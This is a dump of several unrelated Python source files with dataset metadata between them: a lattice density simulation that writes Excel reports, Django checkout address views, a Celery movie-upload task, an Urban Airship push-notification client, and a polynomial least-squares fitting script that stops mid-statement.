                worksheet2.write(x+1,0,"Gen. "+str(x))
            for y in range(timesteps+1):
                worksheet2.write(0,y+1,str(y))
            for y in range(monte.getTimesteps()): #JKP: Follows new updates
                for x in range(network.generations+1): #JKP: Follows new updates
                    worksheet2.write(x+1,y+1,monte.density(x,monte.simData(y)))
                worksheet2.write(network.generations+1,y+1,density_list[i][y]) ## #
        if (trials >= 100) and ((10*i)%trials == 0):
            # Progress report roughly every 10% on long runs.
            try:
                ti = (time.time()-run_time)
                print("Trial: "+str(i))
                print(str(ti)+" secs")
            except NameError: pass
    # Connected correlation <AB> - <A><B> per node pair, per timestep.
    corr_t = dict()
    for n in range(len(node_list)):
        corr_t[n] = [0]*(timesteps+1)
        for t in range(timesteps+1):
            sum_prod = 0
            n1 = 0
            n2 = 0
            for i in range(trials):
                sum_prod += (node_d[i][n][0][t])*(node_d[i][n][1][t])
                n1 += node_d[i][n][0][t]
                n2 += node_d[i][n][1][t]
            corr_t[n][t] = (sum_prod/trials)-(n1/trials)*(n2/trials)
    for n in range(len(node_list)): # For recording correlations
        sheetname = ("Nodes_%d+%d" %(node_list[n][0],node_list[n][1]))
        chartrange = '='+sheetname+'!$B$2:$'+endcol+'$2'
        corr_sheet = workbook.add_worksheet(sheetname)
        corr_sheet.write(0,0,"Timestep")
        corr_sheet.write(1,0,"Correlation")
        corr_chart = workbook.add_chart({'type':'line'})
        corr_sheet.insert_chart('I8', corr_chart)
        corr_chart.set_title({'name':'Correlation'})
        corr_chart.set_x_axis({'name':'Timesteps'})
        corr_chart.set_y_axis({'name':'Correlation'})
        corr_chart.add_series({'values':chartrange,
                               'name':'Correlation'})
        for t in range(timesteps+1):
            corr_sheet.write(0,t+1,t)
            corr_sheet.write(1,t+1,corr_t[n][t])
    ### FOR RECORDING OVERALL DATA ###
    overall.write(0,0,"Generation") # For steady-state analysis
    for x in range(generations):
        overall.write(x+1,0,"Gen. "+str(x))
    overall.write(0,1,"Average")
    overall.write(0,2,"Std Dev")
    for x in range(generations):
        if x == 0:
            for y in range(trials):
                dens_collect[y][x] = monte.density(x,state_collect[y])
        else:
            # Normalize by the number of nodes in generation x.
            for y in range(trials):
                dens_collect[y][x] = monte.density(x,state_collect[y])/ \
                                     ((links)*(links-1)**(x-1))
    if trials <= 10: # Densities per gen for individual trials
        for y in range(trials):
            overall.write(0,y+4,"Trial "+str(y+1))
            overall.write(generations+1,y+4,density_list[y][timesteps])
        for x in range(generations):
            for y in range(trials):
                overall.write(x+1,y+4,dens_collect[y][x])
    for x in range(generations): # Average density per generation
        list_gen = [] # Temporary variable
        for y in range(trials):
            list_gen.append(dens_collect[y][x])
        av = sum(list_gen)/(trials)
        if method == 'TM':
            av = (av+1)/2
        SD = sqrt((av)*(1-av)/total_nodes[generations-1][links])
        if method == 'TM':
            SD *= 2
        overall.write(x+1,1,str(av))
        overall.write(x+1,2,str(SD))
    overall.write(generations+1,0,"Total")
    tot_sum = 0
    for c in range(trials):
        tot_sum += density_list[c][timesteps]
    tot_av = tot_sum/trials
    if method == 'TM':
        tot_av = (tot_av+1)/2
    SD_all = sqrt((tot_av)*(1-tot_av)/(trials*total_nodes[generations-1][links]))
    if method == 'TM':
        SD_all *= 2
    overall.write(generations+1,1,tot_av)
    overall.write(generations+1,2,SD_all)
    # Average density over time
    overtime.write(0,0,"Timestep")
    data_tag = method+" "+str(generations)+" "+str(links)+" "+tags
    overtime.write(1,0,data_tag)
    chartrange = '=Over_Time!$B$2:$'+endcol+'$2'
    over_chart = workbook.add_chart({'type':'line'})
    overtime.insert_chart('I8',over_chart)
    over_chart.set_title({'name':'Density'})
    over_chart.set_x_axis({'name':'Timesteps'})
    over_chart.set_y_axis({'name':'Density'})
    over_chart.add_series({'values':('=Over_Time!$B$2:$'+endcol+'$2'),
                           'name':'=Over_Time!$A$2'})
    over_chart.add_series({'values':('=Over_Time!$B$3:$'+endcol+'$3'),
                           'name':'=Over_Time!$A$3'})
    over_chart.add_series({'values':('=Over_Time!$B$4:$'+endcol+'$4'),
                           'name':'=Over_Time!$A$4'})
    if trials <= 10:
        for t in range(trials):
            overtime.write(t+3,0,"Trial "+str(t+1))
            for m in range(timesteps+1):
                overtime.write(t+3,m+1,density_list[t][m])
        if method == 'TM':
            # fix: original wrote "k: "%(k) -- a %-format with no placeholder,
            # which raises TypeError at runtime. Concatenate like the branch below.
            overtime.write(6,1,"k: "+str(k))
            overtime.write(6,2,"J: "+str(J))
            for i in range(generations+1):
                overtime.write(i+6+trials,0,"Generation: "+str(i))
                # fix: wrap the index like the else branch; temp_d may hold
                # fewer entries than generations+1 (see the d%iterate loop above).
                overtime.write(i+6+trials,1,str(temp_d[i%len(temp_d)]))
    else:
        overtime.write(6,0,"Trials: "+str(trials))
        if method == 'TM':
            overtime.write(6,1,"k: "+str(k))
            overtime.write(6,2,"J: "+str(J))
            overtime.write(8,0,"Temperatures")
            for i in range(generations+1):
                overtime.write(i+9,0,"Gen: "+str(i))
                overtime.write(i+9,1,str(temp_d[i%len(temp_d)]))
    for m in range(timesteps+1):
        t_sum = 0
        overtime.write(0,m+1,m)
        for t in range(trials):
            t_sum += density_list[t][m]
        t_av = t_sum/trials
        overtime.write(1,m+1,t_av)
    workbook.close()
def main():
    """Interactively collect parameters from stdin and run one simulation."""
    print("To change the default timesteps, initial state, temperatures, or"+\
          " nodes for comparison, change the values in the change_me.py file.")
    print("Enter 'NN', 'TL', 'EI', or 'TM' for nearest neighbors, total " +
          "lattice density, empty interval, or temperature methods.")
    method = input("Method: ").upper()
    generations = int(input("Number of generations: "))
    links = int(input("Number of links: "))
    trials = int(input("Number of trials: "))
    # Each method prompts only for its own rates; the others are zeroed
    # (k/J default to 1) so simulate() always gets a full argument list.
    if method == 'NN':
        alpha = float(input("Alpha value: "))
        beta = float(input("Beta value: "))
        gamma = float(input("Value for gamma: "))
        mu = r1 = r2 = 0
        k_c = J_c = 1
    elif method == 'TL':
        mu = float(input("Mu value: "))
        gamma = float(input("Value for gamma: "))
        alpha = beta = r1 = r2 = 0
        k_c = J_c = 1
    elif method == 'EI':
        print("R1 should be less than R2 for electrostatic models.")
        r1 = float(input("R1 value: "))
        r2 = float(input("R2 value: "))
        gamma = float(input("Value for gamma: "))
        alpha = beta = mu = 0
        k_c = J_c = 1
    elif method == 'TM':
        print("Retrieving temperatures from change_me.py...")
        choose = input("Change k & J values from 1? [Y/N] ").upper()
        if choose == 'Y':
            k_c = float(input("k value: "))
            J_c = float(input("J value: "))
        else: k_c = J_c = 1
        alpha = beta = gamma = mu = r1 = r2 = 0
    else: raise ValueError("Method not recognized")
    # Time the whole run and report wall-clock duration.
    start_time = time.time()
    simulate(method, generations, links, alpha, beta, gamma, mu, r1,r2,trials,k_c,J_c)
    print("--- %s seconds ---" % (time.time() - start_time))
def alpha_range(generations, links, beta, gamma, trials):
    """Run one 'NN' simulation for every alpha value listed in change_me."""
    from change_me import alpha_list
    started = time.time()
    for alpha_value in alpha_list:
        simulate('NN', generations, links, alpha_value, beta, gamma,
                 0, 0, 0, trials, 1, 1)
    print("--- runtime is %s seconds ---" % (time.time() - started))
def beta_range(generations, links, alpha, gamma, trials):
    """Run one 'NN' simulation for every beta value listed in change_me."""
    from change_me import beta_list
    started = time.time()
    for beta_value in beta_list:
        simulate('NN', generations, links, alpha, beta_value, gamma,
                 0, 0, 0, trials, 1, 1)
    print("--- runtime is %s seconds ---" % (time.time() - started))
def mu_range(generations, links, gamma, trials):
    """Run one 'TL' simulation for every mu value listed in change_me."""
    from change_me import mu_list
    started = time.time()
    for mu_value in mu_list:
        simulate('TL', generations, links, 0, 0, gamma, mu_value,
                 0, 0, trials, 1, 1)
    print("--- runtime is %s seconds ---" % (time.time() - started))
def r1_range(generations, links, r2, gamma, trials):
    """Run one 'EI' simulation for every r1 value listed in change_me."""
    from change_me import r1_list
    started = time.time()
    for r1_value in r1_list:
        simulate('EI', generations, links, 0, 0, gamma, 0,
                 r1_value, r2, trials, 1, 1)
    print("--- runtime is %s seconds ---" % (time.time() - started))
def r2_range(generations, links, r1, gamma, trials):
    """Run one 'EI' simulation for every r2 value listed in change_me."""
    from change_me import r2_list
    started = time.time()
    for r2_value in r2_list:
        simulate('EI', generations, links, 0, 0, gamma, 0,
                 r1, r2_value, trials, 1, 1)
    print("--- runtime is %s seconds ---" % (time.time() - started))
def full(method, generations, links, trials):
    """Sweep every parameter combination from change_me for the given method.

    Calls simulate() once per combination, so expect one workbook each.
    """
    start_time = time.time()
    if method == 'NN':
        from change_me import alpha_list
        from change_me import beta_list
        from change_me import gamma_list
        mu = r1 = r2 = 0
        for a in alpha_list:
            for b in beta_list:
                for g in gamma_list:
                    simulate('NN', generations, links, a, b, g, mu, r1, r2, trials, 1, 1)
    elif method == 'EI':
        from change_me import r1_list
        from change_me import r2_list
        from change_me import gamma_list
        alpha = beta = mu = 0
        # Electrostatic model is only meaningful for r2 >= r1.
        for rt1 in r1_list:
            for rt2 in r2_list:
                for g in gamma_list:
                    if rt2 >= rt1:
                        # fix: the original call dropped `mu` (and J), shifting
                        # every argument after gamma and raising TypeError.
                        simulate('EI', generations, links, alpha, beta, g,
                                 mu, rt1, rt2, trials, 1, 1)
    elif method == 'TL':
        from change_me import mu_list
        from change_me import gamma_list
        alpha = beta = r1 = r2 = 0
        for m in mu_list:
            for g in gamma_list:
                simulate('TL', generations, links, alpha, beta, g, m, r1, r2, trials, 1, 1)
    print("--- runtime is %s seconds ---" % (time.time() - start_time))
def no_evaporation(method, generations, links, trials):
    """Parameter sweep like full(), but with evaporation disabled (gamma = 0)."""
    start_time = time.time()
    if method == 'NN':
        from change_me import alpha_list
        from change_me import beta_list
        mu = r1 = r2 = 0
        for a in alpha_list:
            for b in beta_list:
                simulate('NN', generations, links, a, b, 0, mu, r1, r2, trials, 1, 1)
    elif method == 'EI':
        from change_me import r1_list
        from change_me import r2_list
        alpha = beta = mu = 0
        # Electrostatic model is only meaningful for r2 >= r1.
        for rt1 in r1_list:
            for rt2 in r2_list:
                if rt2 >= rt1:
                    simulate('EI',generations, links, alpha, beta, 0, mu, rt1, rt2, trials, 1, 1)
    elif method == 'TL':
        from change_me import mu_list
        alpha = beta = r1 = r2 = 0
        for m in mu_list:
            # fix: the original omitted the required k and J arguments,
            # raising TypeError on every TL sweep.
            simulate('TL', generations, links, alpha, beta, 0, m, r1, r2, trials, 1, 1)
    print("--- runtime is %s seconds ---" % (time.time() - start_time))
# Run the interactive entry point only when executed as a script.
if __name__ == "__main__":
    main()
## Things to look at/fix:
## Clean up formatting
## Make this able to call the lattice class
## Make sure last gen is clean
## Change progress bar for multiple parameters and trial 0
## Steady-state analysis for more timesteps?
## Make sure I'm doing standard deviation correctly
| 41.048951
| 112
| 0.566667
|
80ecf5fdfee7913776346e9b631a7b918e035cd7
| 4,506
|
py
|
Python
|
src/addresses/views.py
|
caesarorz/complete-ecommerce
|
35493812167c208c166df3048190a9988adf6bb0
|
[
"MIT"
] | null | null | null |
src/addresses/views.py
|
caesarorz/complete-ecommerce
|
35493812167c208c166df3048190a9988adf6bb0
|
[
"MIT"
] | null | null | null |
src/addresses/views.py
|
caesarorz/complete-ecommerce
|
35493812167c208c166df3048190a9988adf6bb0
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render,redirect
from django.utils.http import is_safe_url
from .forms import AddressForm
from .models import Address
# Create your views here.
from billing.models import BillingProfile
def checkout_address_create_view(request):
    """Create a shipping/billing Address from POSTed form data.

    On success, stores the new address id in the session under
    "<address_type>_address_id" and redirects to `next` when it is a safe
    URL; in every other case falls back to the checkout page.
    """
    form = AddressForm(request.POST or None)
    context = {
        "form": form
    }
    print(form)
    # `next` may arrive via query string or form body.
    next_ = request.GET.get('next')
    next_post = request.POST.get('next')
    redirect_path = next_ or next_post or None
    if form.is_valid():
        instance = form.save(commit=False)
        billing_profile, billing_profile_created = BillingProfile.objects.new_or_get(request)
        if billing_profile is not None:
            address_type = request.POST.get('address_type', 'shipping')
            instance.billing_profile = billing_profile
            instance.address_type = address_type
            instance.save()
            # Remember which address to use for this checkout session.
            request.session[address_type + "_address_id"] = instance.id
            print(address_type + "_address_id")
        else:
            print("Error here")
            return redirect("cart:checkout")
        # Only follow `next` when it points back at this host.
        if is_safe_url(redirect_path, request.get_host()):
            return redirect(redirect_path)
    else:
        print("\n\n**********************Not valid form")
    # fix: always return a response -- the original returned None (a Django
    # error) when the form was valid but `next` was missing or unsafe.
    return redirect("cart:checkout")
def checkout_address_reuse_view(request):
    """Attach a previously saved Address (by id) to the current checkout.

    Only acts for authenticated users on POST, and only when the chosen
    address belongs to the requester's billing profile. Always ends by
    redirecting (to `next` when safe, otherwise to the checkout page).
    """
    if request.user.is_authenticated():
        context = {}
        next_ = request.GET.get('next')
        next_post = request.POST.get('next')
        redirect_path = next_ or next_post or None
        if request.method == 'POST':
            shipping_address = request.POST.get('shipping_address', None)
            address_type = request.POST.get('address_type', 'shipping')
            billing_profile, billing_profile_created = BillingProfile.objects.new_or_get(request)
            if shipping_address is not None:
                # Only accept an address owned by this billing profile.
                qs = Address.objects.filter(billing_profile=billing_profile, id=shipping_address)
                if qs.exists():
                    request.session[address_type + "_address_id"] = shipping_address
                if is_safe_url(redirect_path, request.get_host()):
                    return redirect(redirect_path)
    # fix: always return a response -- the original returned None for
    # anonymous users and for non-POST / no-address paths.
    return redirect("cart:checkout")
#
# def checkout_address_create_view(request):
# print("checkout_address_create_view ",request)
# form = AddressForm(request.POST or None)
# context = {
# "form":form
# }
# next_ = request.GET.get('next')
# next_post = request.POST.get('next')
# redirect_path = next_ or next_post or None
#
# if form.is_valid():
# print("addresses.views.py request.POST",request.POST)
# instance=form.save(commit=False)
# billing_profile, billing_profile_created = BillingProfile.objects.new_or_get(request)
# if billing_profile is not None:
# address_type = request.POST.get('address_type','shipping')
# print("addresses.views.py address_type",address_type)
# instance.billing_profile = billing_profile
# instance.address_type = address_type
# instance.save()
# request.session[address_type + '_address_id'] = instance.id
# print("addresses.views.py address_type ",address_type + '_address_id')
# else:
# print("Error here")
# return redirect('cart:checkout')
# if is_safe_url(redirect_path, request.get_host()):
# return redirect(redirect_path)
# return redirect('cart:checkout')
#
# def checkout_address_reuse_view(request):
# if request.user.is_authenticated():
# context = {}
# next_ = request.GET.get('next')
# next_post = request.POST.get('next')
# redirect_path = next_ or next_post or None
# if request.method == 'POST':
# shipping_address = request.POST.get('shipping_address', None)
# address_type = request.POST.get('address_type','shipping')
# billing_profile, billing_profile_created = BillingProfile.objects.new_or_get(request)
# if shipping_address is not None:
# qs = Address.objects.filter(billing_profile=billing_profile,id=shipping_address)
# if qs.exists():
# request.session[address_type + '_address_id'] = shipping_address
# if is_safe_url(redirect_path, request.get_host()):
# return redirect(redirect_path)
# return redirect('cart:checkout')
| 42.509434
| 99
| 0.638704
|
5b15ee3bcc5749c20d41636c569fa2e558cd7420
| 850
|
py
|
Python
|
tel_storage/tasks.py
|
nalimhahs/pwnit
|
b0752cb1c7e981addb3b3b57aa444c5823a911f6
|
[
"MIT"
] | null | null | null |
tel_storage/tasks.py
|
nalimhahs/pwnit
|
b0752cb1c7e981addb3b3b57aa444c5823a911f6
|
[
"MIT"
] | 10
|
2021-03-19T04:34:51.000Z
|
2022-03-12T00:44:21.000Z
|
tel_storage/tasks.py
|
nalimhahs/pwnit
|
b0752cb1c7e981addb3b3b57aa444c5823a911f6
|
[
"MIT"
] | null | null | null |
from config import celery_app
from movies.models import Movie
from django.conf import settings
import json
import requests
@celery_app.task()
def upload_movie(movie_pk):
    """Celery task: push a downloaded movie file to the stream server.

    Marks the movie UPLOADING, POSTs its file path and id to the stream
    server's /upload endpoint, and on a 2xx response records the returned
    message id and marks the movie READY. Returns the Movie instance.
    """
    movie = Movie.objects.get(pk=movie_pk)
    movie.set_status(Movie.UPLOADING)
    response = requests.post(
        settings.STREAM_SERVER_URL + "/upload",
        data={"file_path": movie.file_location, "movie_id": movie.pk},
    )
    if response.status_code in (200, 201, 202):
        movie.set_status(Movie.UPLOAD_COMPLETE)
        # The stream server's JSON body carries the stored message id.
        movie.tel_message_id = json.loads(response.text)["message_id"]
        movie.set_status(Movie.READY)
    # NOTE(review): on a non-2xx response the movie is left in UPLOADING --
    # confirm whether a failure status should be set instead.
    return movie
@celery_app.task()
def auto_upload_movie():
    """Queue an upload task for every movie whose download has finished."""
    pending = Movie.objects.filter(status=Movie.DOWNLOAD_COMPLETE)
    for item in pending:
        upload_movie.delay(item.pk)
    return {"downloaded": pending}
| 29.310345
| 70
| 0.718824
|
7dd3346e36f070e41974fd9d11a94f06cb797477
| 8,425
|
py
|
Python
|
urbanairship.py
|
mattmakai/python-library
|
6decb024e73f112f71d20e2223e18afdf3499ffc
|
[
"BSD-2-Clause"
] | 1
|
2022-02-06T16:27:19.000Z
|
2022-02-06T16:27:19.000Z
|
urbanairship.py
|
mattmakai/python-library
|
6decb024e73f112f71d20e2223e18afdf3499ffc
|
[
"BSD-2-Clause"
] | null | null | null |
urbanairship.py
|
mattmakai/python-library
|
6decb024e73f112f71d20e2223e18afdf3499ffc
|
[
"BSD-2-Clause"
] | null | null | null |
"""Python module for using the Urban Airship API"""
import httplib
import urllib
try:
import simplejson as json
except ImportError:
import json
# Host and endpoint URLs for the Urban Airship REST API.
SERVER = 'go.urbanairship.com'
BASE_URL = "https://go.urbanairship.com/api"
DEVICE_TOKEN_URL = BASE_URL + '/device_tokens/'
APIDS_TOKEN_URL = BASE_URL + '/apids/'
PUSH_URL = BASE_URL + '/push/'
BATCH_PUSH_URL = BASE_URL + '/push/batch/'
BROADCAST_URL = BASE_URL + '/push/broadcast/'
FEEDBACK_URL = BASE_URL + '/device_tokens/feedback/'
class Unauthorized(Exception):
    """Raised when we get a 401 from the server (bad key/secret)."""
class AirshipFailure(Exception):
    """Raised when we get an error response from the server.
    args are (status code, message)
    """
class AirshipList(object):
    """Parent class that represents a list of iOS devices or
    Android C2DM APIDs. Only meant to be used by subclasses.
    """
    def __init__(self, airship):
        # Keep the client so subclasses can issue authenticated requests.
        self._airship = airship
class AirshipDeviceList(AirshipList):
    """Iterator that fetches and returns a list of iOS device tokens
    Follows pagination.

    NOTE(review): no __iter__/next methods are visible in this chunk even
    though the docstring promises iteration; _token_iter is prepared but
    never consumed here -- confirm the iteration protocol elsewhere.
    """
    def __init__(self, airship):
        super(AirshipDeviceList, self).__init__(airship)
        self._load_page(DEVICE_TOKEN_URL)
    def __len__(self):
        # Count field reported by the server in the loaded page.
        return self._page['device_tokens_count']
    def _load_page(self, url):
        # Fetch one page of results; cache it and an iterator over its tokens.
        status, response = self._airship._request('GET', None, url)
        if status != 200:
            raise AirshipFailure(status, response)
        self._page = page = json.loads(response)
        self._token_iter = iter(page['device_tokens'])
class AirshipAPIDsList(AirshipList):
    """Iterator that fetches and returns a list of Android
    C2DM APIDs.

    NOTE(review): like AirshipDeviceList, no __iter__/next methods are
    visible here despite the docstring -- confirm iteration elsewhere.
    """
    def __init__(self, airship):
        super(AirshipAPIDsList, self).__init__(airship)
        self._load_page(APIDS_TOKEN_URL)
    def __len__(self):
        # Length of the currently loaded page of APIDs.
        return len(self._page['apids'])
    def _load_page(self, url):
        # Fetch one page of results; cache it and an iterator over its APIDs.
        status, response = self._airship._request('GET', None, url)
        if status != 200:
            raise AirshipFailure(status, response)
        self._page = page = json.loads(response)
        self._token_iter = iter(page['apids'])
class Airship(object):
def __init__(self, key, secret):
self.key = key
self.secret = secret
self.auth_string = ('%s:%s' % (key, secret)).encode('base64')[:-1]
def _request(self, method, body, url, content_type=None):
h = httplib.HTTPSConnection(SERVER)
headers = {
'authorization': 'Basic %s' % self.auth_string,
}
if content_type:
headers['content-type'] = content_type
h.request(method, url, body=body, headers=headers)
resp = h.getresponse()
if resp.status == 401:
import pdb; pdb.set_trace()
raise Unauthorized
return resp.status, resp.read()
def register(self, device_token, alias=None, tags=None, badge=None):
"""Register the device token with UA."""
url = DEVICE_TOKEN_URL + device_token
payload = {}
if alias is not None:
payload['alias'] = alias
if tags is not None:
payload['tags'] = tags
if badge is not None:
payload['badge'] = badge
if payload:
body = json.dumps(payload)
content_type = 'application/json'
else:
body = ''
content_type = None
status, response = self._request('PUT', body, url, content_type)
if not status in (200, 201):
raise AirshipFailure(status, response)
return status == 201
def registerAPID(self, APID_token, c2dm_registration_id, alias=None, \
tags=None, badge=None):
"""Register APID token with UA."""
url = APIDS_TOKEN_URL + APID_token
payload = {}
if alias is not None:
payload['alias'] = alias
if tags is not None:
payload['tags'] = tags
if badge is not None:
payload['badge'] = badge
if c2dm_registration_id:
payload['c2dm_registration_id'] = c2dm_registration_id
if payload:
body = json.dumps(payload)
content_type = 'application/json'
else:
body = ''
content_type = None
status, response = self._request('PUT', body, url, content_type)
if not status in (200, 201):
raise AirshipFailure(status, response)
return status == 201
def deregister(self, device_token, url=None):
"""Mark this device token as inactive"""
if url == None:
url = DEVICE_TOKEN_URL + device_token
status, response = self._request('DELETE', '', url, None)
if status != 204:
raise AirshipFailure(status, response)
def deregisterAPID(self, APID_token):
"""Mark this APID token as inactive."""
url = APIDS_TOKEN_URL + APID_token
self.deregister(APID_token, url)
def get_device_token_info(self, device_token, url=None):
"""Retrieve information about this device token"""
if url == None:
url = DEVICE_TOKEN_URL + device_token
status, response = self._request('GET', None, url)
if status == 404:
return None
elif status != 200:
raise AirshipFailure(status, response)
return json.loads(response)
def get_APID_token_info(self, APID_token):
"""Retrieve information about this APID token"""
url = APIDS_TOKEN_URL + APID_token
return self.get_device_token_info(APID_token, url)
def get_device_tokens(self):
return AirshipDeviceList(self)
def get_apids(self):
return AirshipAPIDsList(self)
def push(self, payload, device_tokens=None, aliases=None, tags=None, schedule_for=None, APID_tokens=None):
"""Push this payload to the specified device tokens and tags."""
if device_tokens:
payload['device_tokens'] = device_tokens
if APID_tokens:
payload['apids'] = APID_tokens
if aliases:
payload['aliases'] = aliases
if tags:
payload['tags'] = tags
if schedule_for:
payload['schedule_for'] = schedule_for
body = json.dumps(payload)
status, response = self._request('POST', body, PUSH_URL,
'application/json')
if not status == 200:
raise AirshipFailure(status, response)
def batch_push(self, payloads):
"""Push the following payloads as a batch.
For payload details see:
http://urbanairship.com/docs/push.html#batch-push
Summary:
List of dictionaries, each with:
* 0 or more "device_tokens"
* 0 or more "aliases"
* "aps" payload.
"""
body = json.dumps(payloads)
status, response = self._request('POST', body, BATCH_PUSH_URL,
'application/json')
if not status == 200:
raise AirshipFailure(status, response)
def broadcast(self, payload, exclude_tokens=None):
"""Broadcast this payload to all users."""
if exclude_tokens:
payload['exclude_tokens'] = exclude_tokens
body = json.dumps(payload)
status, response = self._request('POST', body, BROADCAST_URL,
'application/json')
if not status == 200:
raise AirshipFailure(status, response)
def feedback(self, since):
    """Return device tokens marked inactive since this timestamp.

    Returns a list of (device token, timestamp, alias) tuples.
    (Doc fix: the original docstring said "functions".)

    Example:
        airship.feedback(datetime.datetime.utcnow()
                         - datetime.timedelta(days=1))

    Note:
        In order to parse the result, we need a sane date parser,
        dateutil: http://labix.org/python-dateutil
        Without dateutil the timestamp is returned as the raw string.
    """
    url = FEEDBACK_URL + '?' + \
        urllib.urlencode({'since': since.isoformat()})
    status, response = self._request('GET', '', url)
    if status != 200:  # idiom fix: was ``not status == 200``
        raise AirshipFailure(status, response)
    data = json.loads(response)
    try:
        from dateutil.parser import parse
    except ImportError:
        # Fallback: leave timestamps unparsed.
        def parse(x):
            return x
    return [
        (r['device_token'], parse(r['marked_inactive_on']), r['alias'])
        for r in data]
| 32.528958
| 110
| 0.605816
|
84fcb88d2e2f8289e6739afc4bdc3d3646ad2770
| 1,446
|
py
|
Python
|
src/vendor/mariadb-10.6.7/extra/wolfssl/wolfssl/wrapper/python/wolfssl/test/conftest.py
|
zettadb/zettalib
|
3d5f96dc9e3e4aa255f4e6105489758944d37cc4
|
[
"Apache-2.0"
] | null | null | null |
src/vendor/mariadb-10.6.7/extra/wolfssl/wolfssl/wrapper/python/wolfssl/test/conftest.py
|
zettadb/zettalib
|
3d5f96dc9e3e4aa255f4e6105489758944d37cc4
|
[
"Apache-2.0"
] | null | null | null |
src/vendor/mariadb-10.6.7/extra/wolfssl/wolfssl/wrapper/python/wolfssl/test/conftest.py
|
zettadb/zettalib
|
3d5f96dc9e3e4aa255f4e6105489758944d37cc4
|
[
"Apache-2.0"
] | 2
|
2022-02-27T14:00:01.000Z
|
2022-03-31T06:24:22.000Z
|
# -*- coding: utf-8 -*-
#
# conftest.py
#
# Copyright (C) 2006-2021 wolfSSL Inc.
#
# This file is part of wolfSSL.
#
# wolfSSL is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# wolfSSL is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1335, USA
#/
#/
# pylint: disable=missing-docstring, redefined-outer-name
import sys
import ssl
import wolfssl
import pytest
@pytest.fixture
def tcp_socket():
    """Yield a fresh TCP socket, closed automatically after the test."""
    import socket
    from contextlib import closing

    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        yield s
# Stdlib ``ssl`` is only exercised on Python 3; wolfssl always is.
_PROVIDERS = [ssl, wolfssl] if sys.version_info.major == 3 else [wolfssl]


@pytest.fixture(params=_PROVIDERS,
                ids=[p.__name__ for p in _PROVIDERS])
def ssl_provider(request):
    """Parametrize tests over every available SSL implementation."""
    return request.param
@pytest.fixture
def ssl_context(ssl_provider):
    # Build a context from whichever provider (stdlib ssl or wolfssl)
    # the ssl_provider fixture selected for this parametrization.
    return ssl_provider.SSLContext(ssl_provider.PROTOCOL_SSLv23)
| 29.510204
| 79
| 0.742047
|
f0f114d1fdfe7526e9725a8a1eb7efb2afa81ec6
| 6,235
|
py
|
Python
|
170401017.py
|
larabetul/blm2010
|
f658165bd834e0963c54679a4ccd52c39c1e63fd
|
[
"Unlicense"
] | null | null | null |
170401017.py
|
larabetul/blm2010
|
f658165bd834e0963c54679a4ccd52c39c1e63fd
|
[
"Unlicense"
] | null | null | null |
170401017.py
|
larabetul/blm2010
|
f658165bd834e0963c54679a4ccd52c39c1e63fd
|
[
"Unlicense"
] | null | null | null |
# coding: utf-8
# In[18]:
# cemre doğan 170401017
# Read the whitespace-separated integer case counts into vaka_liste.
with open("veriler.txt", "r", encoding='utf-8') as file:
    vaka_liste = []
    for i in file.read().split():
        vaka_liste.append(int(i))
# print(vaka_liste)
import math
def gauss(A):
    """Solve the n x (n+1) augmented linear system ``A`` and return x.

    Gaussian elimination with partial pivoting followed by back
    substitution.  NOTE: ``A`` is modified in place.
    """
    n = len(A)
    for col in range(n):
        # Choose the pivot: largest absolute value in this column.
        pivot = col
        for row in range(col + 1, n):
            if abs(A[row][col]) > abs(A[pivot][col]):
                pivot = row
        # Swap the pivot row into place (column by column).
        for k in range(col, n + 1):
            A[pivot][k], A[col][k] = A[col][k], A[pivot][k]
        # Eliminate every entry below the pivot.
        for row in range(col + 1, n):
            factor = -A[row][col] / A[col][col]
            for k in range(col, n + 1):
                if k == col:
                    A[row][k] = 0
                else:
                    A[row][k] += factor * A[col][k]
    # Back substitution on the now upper-triangular system.
    x = [0] * n
    for col in range(n - 1, -1, -1):
        x[col] = A[col][n] / A[col][col]
        for row in range(col - 1, -1, -1):
            A[row][n] -= A[row][col] * x[col]
    return x
def xitoplam(derece, liste):
    """Return [n, Σx, Σx², ..., Σx^(2·derece)] where x runs over 1..n.

    These are the power sums of the 1-based sample indices needed for
    the least-squares normal equations of degree *derece*.
    """
    n = len(liste)
    sums = [n]
    for power in range(1, 2 * derece + 1):
        sums.append(sum(j ** power for j in range(1, n + 1)))
    return sums
def xiyitoplam(derece, liste):
    """Return [Σy·x⁰, Σy·x¹, ..., Σy·x^derece], x being the 1-based index.

    Right-hand-side sums for the least-squares normal equations, with
    the data values *liste* as y.
    """
    totals = []
    for power in range(derece + 1):
        totals.append(
            sum(y * ((idx + 1) ** power) for idx, y in enumerate(liste)))
    return totals
def make_matrix(derece, liste):
    """Build the augmented normal-equation matrix for a degree-*derece*
    least-squares polynomial fit of *liste* (rows: derece+1, cols: derece+2).
    """
    order = derece + 1
    xs = xitoplam(order, liste)
    ys = xiyitoplam(order, liste)
    matrix = []
    for row in range(order):
        # Sliding window of power sums plus the matching RHS value.
        line = [xs[col] for col in range(row, order + row)]
        line.append(ys[row])
        matrix.append(line)
    return matrix
# Question 1: least-squares polynomial fits of degree 1..6 on the data.
# BUG FIX: the original degree-2 branch printed its solution to stdout
# and left the "2.dereceden yaklaşım:" label write commented out, unlike
# every other degree; the label is now written.  The pointless
# ``for i in range(7)`` if-chain was flattened — output is otherwise
# identical.
dosya = open("sonuc.txt", "a+", encoding="UTF8", errors="ignore")
dosya.write("İLK SORUNUN CEVABI" + "\n")
a = gauss(make_matrix(1, vaka_liste))
dosya.write("1.dereceden yaklaşım:")
dosya.write(str(a) + "\n")
b = gauss(make_matrix(2, vaka_liste))
dosya.write("2.dereceden yaklaşım:")
dosya.write(str(b) + "\n")
c = gauss(make_matrix(3, vaka_liste))
dosya.write("3.dereceden yaklaşım:")
dosya.write(str(c) + "\n")
d = gauss(make_matrix(4, vaka_liste))
dosya.write("4.dereceden yaklaşım:")
dosya.write(str(d) + "\n")
e = gauss(make_matrix(5, vaka_liste))
dosya.write("5.dereceden yaklaşım:")
dosya.write(str(e) + "\n")
f = gauss(make_matrix(6, vaka_liste))
dosya.write("6.dereceden yaklaşım:")
